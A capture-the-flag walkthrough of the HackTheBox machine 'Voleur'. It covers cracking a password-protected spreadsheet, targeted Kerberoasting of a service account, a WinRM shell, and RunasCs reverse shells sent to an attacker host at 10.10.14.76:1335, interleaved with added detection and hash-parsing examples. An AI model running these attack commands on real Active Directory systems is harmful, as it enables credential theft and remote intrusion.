
HackTheBox - Voleur

On Voleur a password-protected XLSX file was found that contained credentials. BloodHound analysis identified a user that could be Kerberoasted, which gave access over WinRM. Another user was reached through runas, and with it a deleted user was restored. That user gave access to local credentials protected by DPAPI, which in turn gave access to an SSH private key. After logging in with that key, a backup of the Active Directory database together with its log files was found, which allowed privilege escalation.

Name: Voleur
OS: Windows
Points: 30
Difficulty: Medium
Release Date: 2025-07-05
IP: 10.10.11.76
Maker: baseDN

Rated (user-rated difficulty votes): Cake 78, VeryEasy 66, Easy 250, TooEasy 253, Medium 386, BitHard 170, Hard 108, TooHard 31, ExHard 10, BrainFuck 17

Machine Information: Voleur

The machine description emulates a "real" pentest scenario by providing credentials up front.

As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: ryan.naylor / HollowOct31Nyt

Recon

nmap

nmap shows multiple open ports: DNS (53), Kerberos (88), RPC (135), LDAP (389), SMB (445), SSH (2222) and WinRM (5985). The host scripts also report a clock skew of roughly eight hours against the DC, which matters for Kerberos authentication later on.

# Nmap 7.95 scan initiated Sun Jul  6 00:37:54 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,2222,3268,3269,5985,9389,49664,49668,50624,50625,50626,50650,57843 -sV -sC -oN nmap_scan 10.10.11.76
Nmap scan report for 10.10.11.76
Host is up (0.26s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 14:37:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2222/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
50624/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
50625/tcp open  msrpc         Microsoft Windows RPC
50626/tcp open  msrpc         Microsoft Windows RPC
50650/tcp open  msrpc         Microsoft Windows RPC
57843/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-07-06T14:38:39
|_  start_date: N/A
|_clock-skew: 7h59m43s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  6 00:39:41 2025 -- 1 IP address (1 host up) scanned in 106.98 seconds

We add voleur.htb and dc.voleur.htb to /etc/hosts.

Services Access

The credentials are valid for LDAP and SMB over Kerberos. Because of the clock skew seen in the nmap output, every command is wrapped in faketime set from ntpdate against the DC. Note that authenticating against the bare IP fails with KDC_ERR_WRONG_REALM, since Kerberos needs a hostname that maps to a principal in the realm; targeting dc.voleur.htb succeeds.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec ldap 10.10.11.76 -u ryan.naylor -p HollowOct31Nyt -k
LDAP        10.10.11.76     389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        10.10.11.76     389    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb 10.10.11.76 -u ryan.naylor -p HollowOct31Nyt -k
SMB         10.10.11.76     445    10.10.11.76      [*]  x64 (name:10.10.11.76) (domain:10.10.11.76) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.76     445    10.10.11.76      [-] 10.10.11.76\ryan.naylor:HollowOct31Nyt KDC_ERR_WRONG_REALM 
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 

Bloodhound & Analysis

With ryan's credentials we run netexec's BloodHound collector.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec ldap 10.10.11.76 -u ryan.naylor -p HollowOct31Nyt -k --dns-server 10.10.11.76 --bloodhound --collection All
LDAP        10.10.11.76     389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        10.10.11.76     389    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
LDAP        10.10.11.76     389    DC               Resolved collection methods: group, session, psremote, container, acl, rdp, objectprops, localadmin, trusts, dcom
LDAP        10.10.11.76     389    DC               Using kerberos auth without ccache, getting TGT
LDAP        10.10.11.76     389    DC               Done in 00M 49S
LDAP        10.10.11.76     389    DC               Compressing output into /home/kali/.nxc/logs/DC_10.10.11.76_2025-07-06_084240_bloodhound.zip

We build a wordlist from the collected user list.

❯ jq -r '.data[].Properties.name' blood/DC_10.10.11.76_2025-07-06_084240_users.json | tail -n +2 |  awk '{ print tolower($0) }' | cut -d '@' -f1 > users.txt
❯ wc -l users.txt
11 users.txt
❯ cat users.txt
jeremy.combs
svc_winrm
svc_iis
svc_backup
svc_ldap
lacey.miller
marie.bryant
ryan.naylor
krbtgt
guest
administrator

Users

We find eleven users registered in the domain.

image

Ryan

This user shows no group membership or permissions over any other object.

image

svc_ldap

svc_ldap has WriteSPN over svc_winrm. It also has GenericWrite, through the Restore_users group, over Lacey.Miller and Todd.Wolfe.

image

svc_winrm

It is a member of Remote Management Users, so gaining access to this account would allow access over WinRM.

image

SMB

We see that ryan has read access to the IT share.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k  --shares
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share 

We use netexec's spider_plus module to list the IT share, where we find an .xlsx file.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k -M spider_plus --share IT
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Started module spidering_plus with the following options:
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS dc.voleur.htb   445    dc               [*]     STATS_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share 
SPIDER_PLUS dc.voleur.htb   445    dc               [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json".
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Shares:           8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Readable Shares:  4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Filtered Shares:  1
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total folders found:  27
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total files found:    7
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size average:    3.55 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size min:        22 B
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size max:        16.5 KB
❯ jq -r '.IT' /home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json
{
  "First-Line Support/Access_Review.xlsx": {
    "atime_epoch": "2025-01-31 03:09:27",
    "ctime_epoch": "2025-01-29 03:39:51",
    "mtime_epoch": "2025-05-29 16:23:36",
    "size": "16.5 KB"
  }
}

Protected XLSX

We download the file; file reports it as encrypted.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k -M spider_plus --share IT -o DOWNLOAD_FLAG=True
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Started module spidering_plus with the following options:
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*]     STATS_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share 
SPIDER_PLUS dc.voleur.htb   445    dc               [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json".
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Shares:           8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Readable Shares:  4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Filtered Shares:  1
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total folders found:  20
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total files found:    4
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size average:    5.14 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size min:        22 B
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size max:        16.5 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File unique exts:     3 (inf, xlsx, ini)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Downloads successful: 4
SPIDER_PLUS dc.voleur.htb   445    dc               [+] All files processed successfully.
❯ file /home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb/IT/First-Line\ Support/Access_Review.xlsx
/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb/IT/First-Line Support/Access_Review.xlsx: CDFV2 Encrypted

Opening it prompts for a password.

image

Cracking the Hash

We run office2john on the file to obtain the hash, then john with the rockyou wordlist to recover the password.

❯ office2john Access_Review.xlsx
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c
❯ office2john Access_Review.xlsx > xlsx_hash
❯ john xlsx_hash --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 512/512 AVX512BW 16x / SHA512 512/512 AVX512BW 8x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)     
1g 0:00:00:01 DONE (2025-07-06 02:00) 1.000g/s 832.0p/s 832.0c/s 832.0C/s football1..legolas
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
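The $office$ line that office2john printed above packs the parameters of the document's key derivation into one string. The parser below is an added example written for this page, not code from the writeup or from john; it reads those fields from the hash shown above, checks them for consistency (hex fields, declared salt size) and names the hash algorithm per Office version (2010: SHA-1, 2013: SHA-512; only the Agile-encryption layout used by those versions is handled, because the 2007 layout gives the second field a different meaning). Seeing 100000 SHA-512 iterations per guess makes the point of the cracking step: the spin count slows guessing, but does nothing for a password that appears early in a common wordlist.

```python
"""Decode the parameters encoded in an office2john '$office$' hash line.

Added example (not part of the original writeup). Layout for Office
2010/2013 Agile encryption as office2john emits it:
  $office$*<version>*<spin count>*<key bits>*<salt len>*<salt>*<verifier>*<verifier hash>
"""

# The hash for Access_Review.xlsx as shown in the writeup's office2john output.
ACCESS_REVIEW_HASH = (
    "$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5"
    "*500bd7e833dffaa28772a49e987be35b"
    "*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c"
)

# Hash algorithm used by the password KDF per Office version (Agile encryption).
HASH_BY_VERSION = {2010: "SHA-1", 2013: "SHA-512"}


def parse_office_hash(line):
    """Return the KDF parameters in a $office$ hash line.

    Accepts both the bare hash and the 'file.xlsx:$office$...' form that
    office2john prints. Raises ValueError on a malformed or unsupported line.
    """
    if ":" in line.split("*", 1)[0]:          # strip a leading 'filename:' prefix
        line = line.split(":", 1)[1]
    parts = line.split("*")
    if len(parts) != 8 or parts[0] != "$office$":
        raise ValueError("not an office2john hash line")
    version, spin_count, key_bits, salt_len = (int(p) for p in parts[1:5])
    if version not in HASH_BY_VERSION:
        raise ValueError(f"unsupported Office version {version}")
    # bytes.fromhex raises ValueError itself on non-hex input
    salt, verifier, verifier_hash = (bytes.fromhex(p) for p in parts[5:8])
    if len(salt) != salt_len:
        raise ValueError(f"salt is {len(salt)} bytes but header declares {salt_len}")
    return {
        "version": version,
        "hash_algorithm": HASH_BY_VERSION[version],
        "spin_count": spin_count,          # hash iterations per password guess
        "key_bits": key_bits,
        "salt": salt,
        "verifier": verifier,
        "verifier_hash": verifier_hash,
    }


if __name__ == "__main__":
    p = parse_office_hash(ACCESS_REVIEW_HASH)
    print(f"Office {p['version']}: {p['spin_count']} x {p['hash_algorithm']} per guess, "
          f"{p['key_bits']}-bit key, {len(p['salt'])}-byte salt")
```

A document password only protects the bytes of the file; it is not access control. An access review that lists service-account passwords on a share readable by first-line support is the real finding here, independent of how strong the spreadsheet password was.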

Users Information

After opening the file we see a list of users with job title, permissions and notes. Passwords for some accounts are written in the notes.

User | Job Title | Permissions | Notes
Ryan.Naylor | First-Line Support Technician | SMB | Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant | First-Line Support Technician | SMB |
Lacey.Miller | Second-Line Support Technician | Remote Management Users |
Todd.Wolfe | Second-Line Support Technician | Remote Management Users | Leaver. Password was reset to NightT1meP1dg3on14 and account deleted.
Jeremy.Combs | Third-Line Support Technician | Remote Management Users | Has access to Software folder.
Administrator | Administrator | Domain Admin | Not to be used for daily tasks!

Service Account | Permissions | Notes
svc_backup | Windows Backup | Speak to Jeremy!
svc_ldap | LDAP Services | P/W – M1XyC9pW7qT5Vn
svc_iis | IIS Administration | P/W – N5pXyW1VqM7CZ8
svc_winrm | Remote Management | Need to ask Lacey as she reset this recently.

Check Passwords

We run netexec with the user and password lists; two valid credential pairs show up.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec ldap dc.voleur.htb -u users.txt -p pass.txt -k --continue-on-success | grep '[+]'
LDAP                     dc.voleur.htb   389    DC               [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn 
LDAP                     dc.voleur.htb   389    DC               [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8 

svc_ldap -> svc_winrm

Since svc_ldap has WriteSPN over svc_winrm, we set an SPN (ServicePrincipalName) on that account and then Kerberoast it to obtain a TGS hash. Any domain user can request a service ticket for an account that carries an SPN, and that ticket is encrypted with a key derived from the account's password, which is what makes it crackable offline.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_ldap:M1XyC9pW7qT5Vn ; export KRB5CCNAME=svc_ldap.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_ldap.ccache
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" bloodyAD --host dc.voleur.htb -d voleur.htb -k set object svc_winrm servicePrincipalName -v 'sc/kull.htb'
[+] svc_winrm's servicePrincipalName has been updated
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-GetUserSPNs -request -no-pass -k -dc-ip 10.10.11.76 -dc-host dc.voleur.htb voleur.htb/ -outputfile svc_winrm_k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name       MemberOf                                                PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  ------------------------------------------------------  --------------------------  --------------------------  ----------
sc/kull.htb            svc_winrm  CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb  2025-01-31 03:10:12.398769  2025-07-06 09:49:43.160944             



❯ cat svc_winrm_k
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$712038502f0567bd5cdd3c59ef1415a6$...

faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_ldap:M1XyC9pW7qT5Vn
export KRB5CCNAME=svc_ldap.ccache
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" bloodyAD --host dc.voleur.htb -d voleur.htb -k set object svc_winrm servicePrincipalName -v 'sc/kull.htb'
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-GetUserSPNs -request -no-pass -k -dc-ip 10.10.11.76 -dc-host dc.voleur.htb voleur.htb/ -outputfile svc_winrm_k
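From the domain controller's side, the svc_ldap -> svc_winrm step above leaves a two-event trace in the Security log: a 5136 (directory service object modified) writing servicePrincipalName on a user object, followed by a 4769 (Kerberos service ticket requested) for that account with TicketEncryptionType 0x17, the RC4 type a cracking-oriented request prefers. The detection below is an added example written for this page, not the writeup's or any vendor's code. The event IDs and field names are the real Windows Security log ones; the sample records, the 24-hour window and the list of principals allowed to write SPNs (here just Administrator) are constructed assumptions for the example. It requires directory service change auditing (which produces 5136) to be enabled.

```python
"""Correlate an SPN write on a user object with a follow-on RC4 TGS request.

Added example (not part of the original writeup). Events are the flattened
dicts a SIEM export would hand over; only the field names are real.
"""
from datetime import datetime, timedelta

# Constructed sample events modelled on the writeup's svc_ldap -> svc_winrm step.
SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2025-07-06T09:40:00", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "sc/kull.htb", "OperationType": "%%14674"},   # %%14674 = value added
    {"EventID": 4769, "Time": "2025-07-06T09:41:30",
     "TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_winrm",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.76"},
    # Benign noise: an AES ticket for the DC's own services...
    {"EventID": 4769, "Time": "2025-07-06T09:42:00",
     "TargetUserName": "ryan.naylor@VOLEUR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.50"},
    # ...and an SPN written by an administrator, which is expected.
    {"EventID": 5136, "Time": "2025-07-06T08:00:00", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=svc_iis,CN=Users,DC=voleur,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "HTTP/web.voleur.htb", "OperationType": "%%14674"},
]

EXPECTED_SPN_WRITERS = {"Administrator"}   # assumption: who legitimately manages SPNs
RC4_HMAC = "0x17"
CORRELATION_WINDOW = timedelta(hours=24)


def account_from_dn(dn):
    """'CN=svc_winrm,CN=Users,DC=voleur,DC=htb' -> 'svc_winrm'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def detect_targeted_kerberoast(events, writers=EXPECTED_SPN_WRITERS,
                               window=CORRELATION_WINDOW):
    """Return one alert per SPN value added to a user object by an unexpected
    principal that is followed, within `window`, by an RC4-encrypted service
    ticket request for that same account."""
    spn_writes = [e for e in events
                  if e["EventID"] == 5136
                  and e["AttributeLDAPDisplayName"] == "servicePrincipalName"
                  and e["ObjectClass"] == "user"
                  and e["OperationType"] == "%%14674"
                  and e["SubjectUserName"] not in writers]
    rc4_requests = [e for e in events
                    if e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC]

    alerts = []
    for w in spn_writes:
        account = account_from_dn(w["ObjectDN"])
        t_write = datetime.fromisoformat(w["Time"])
        for r in rc4_requests:
            t_req = datetime.fromisoformat(r["Time"])
            if r["ServiceName"].lower() == account.lower() and t_write <= t_req <= t_write + window:
                alerts.append({
                    "account": account,
                    "spn": w["AttributeValue"],
                    "written_by": w["SubjectUserName"],
                    "requested_by": r["TargetUserName"],
                    "from_ip": r["IpAddress"],
                    "delay_s": int((t_req - t_write).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for a in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(f"[!] {a['written_by']} added SPN {a['spn']!r} to {a['account']}; "
              f"{a['requested_by']} requested an RC4 ticket for it {a['delay_s']}s later "
              f"from {a['from_ip']}")
```

The same two facts the detection keys on are also the fix: review who holds WriteSPN or GenericWrite over service accounts (the BloodHound edge seen earlier), and restrict the account to AES via msDS-SupportedEncryptionTypes so that a 4769 with type 0x17 for it is anomalous on its own.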

Cracking the Hash

Running john on the hash yields the password.

❯ john svc_winrm_k --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFireInsidedeOzarctica980219afi (?)     
1g 0:00:00:04 DONE (2025-07-06 02:29) 0.2267g/s 2601Kp/s 2601Kc/s 2601KC/s AHANACK6978012..AFITA4162
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

svc_winrm

svc_winrm is a member of Remote Management Users, so it can log in over WinRM. First we create a krb5.conf with the voleur realm configuration so that evil-winrm can use the Kerberos ticket.

[libdefaults]
        default_realm = VOLEUR.HTB
        dns_lookup_realm = false
        dns_lookup_kdc = false

[realms]
        VOLEUR.HTB = {
                kdc = dc.voleur.htb
                admin_server = dc.voleur.htb
                default_domain = voleur.htb
        }

[domain_realm]
        voleur.htb = VOLEUR.HTB
        .voleur.htb = VOLEUR.HTB

We log in over WinRM by first running impacket-getTGT to obtain a ticket, then using it with evil-winrm to get a shell and read the user.txt flag.

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi ; export KRB5CCNAME=svc_winrm.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_winrm.ccache
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> whoami
voleur\svc_winrm
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> dir -force ../Desktop


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         1/29/2025   7:07 AM            282 desktop.ini
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025   8:44 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cat ../Desktop/user.txt
6e89e40cc1a86194030a4fd835c23757
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
# svc_winrm
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi
export KRB5CCNAME=svc_winrm.ccache
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
# svc_iis
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe svc_iis N5pXyW1VqM7CZ8 powershell.exe -r 10.10.14.76:1335
[*] Warning: User profile directory for user svc_iis does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'svc_iis' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-4ee52$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 6904 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

User - svc_ldap

Using RunasCs we obtain a shell as svc_ldap.

# svc_ldap
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.14.76:1335
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-cde27$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2468 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

This user is a member of RESTORE_USERS, so we list the deleted objects. Among them is the user Todd Wolfe, whose tombstone still shows the account as enabled (userAccountControl 66048) and a member of Remote Management Users.

PS C:\Windows\system32> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *


CanonicalName                   : voleur.htb/Deleted Objects
CN                              : Deleted Objects
Created                         : 1/29/2025 12:42:27 AM
createTimeStamp                 : 1/29/2025 12:42:27 AM
Deleted                         : True
Description                     : Default container for deleted objects
DisplayName                     : 
DistinguishedName               : CN=Deleted Objects,DC=voleur,DC=htb
dSCorePropagationData           : {12/31/1600 4:00:00 PM}
instanceType                    : 4
isCriticalSystemObject          : True
isDeleted                       : True
LastKnownParent                 : 
